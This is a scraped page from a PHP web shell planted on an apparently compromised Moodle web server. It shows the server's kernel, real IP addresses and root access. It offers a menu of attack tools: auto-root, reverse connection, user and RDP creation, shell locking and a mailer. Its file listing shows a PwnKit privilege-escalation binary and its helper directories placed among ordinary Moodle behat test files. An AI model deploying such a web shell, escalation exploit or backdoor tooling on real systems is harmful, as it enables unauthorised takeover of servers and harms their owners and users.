Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle.backup.39 /
enrol /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
add_to_group.feature
1.54
KB
-rw-rw-r--
behat_enrol.php
4.41
KB
-rw-rw-r--
enrol_user.feature
970
B
-rw-rw-r--
pwnkit
10.99
KB
-rwxr-xr-x
role_visibility.feature
1.93
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : enrol_user.feature
@enrol Feature: User can be enrolled into a course In order to let them participate in course activities As an admin I must be able to enrol users Background: Given the following "users" exist: | username | firstname | lastname | email | | student1 | Studie | One | student1@example.com | And the following "courses" exist: | fullname | shortname | | Course 001 | C001 | And I log in as "admin" And I am on "Course 001" course homepage Scenario: User can be enrolled without javascript When I enrol "Studie One" user as "Student" And I navigate to "Enrolled users" node in "Course administration > Users" Then I should see "Studie One" @javascript Scenario: User can be enrolled with javascript enrol element When I enrol "Studie One" user as "Student" And I navigate to "Enrolled users" node in "Course administration > Users" Then I should see "Studie One"
Close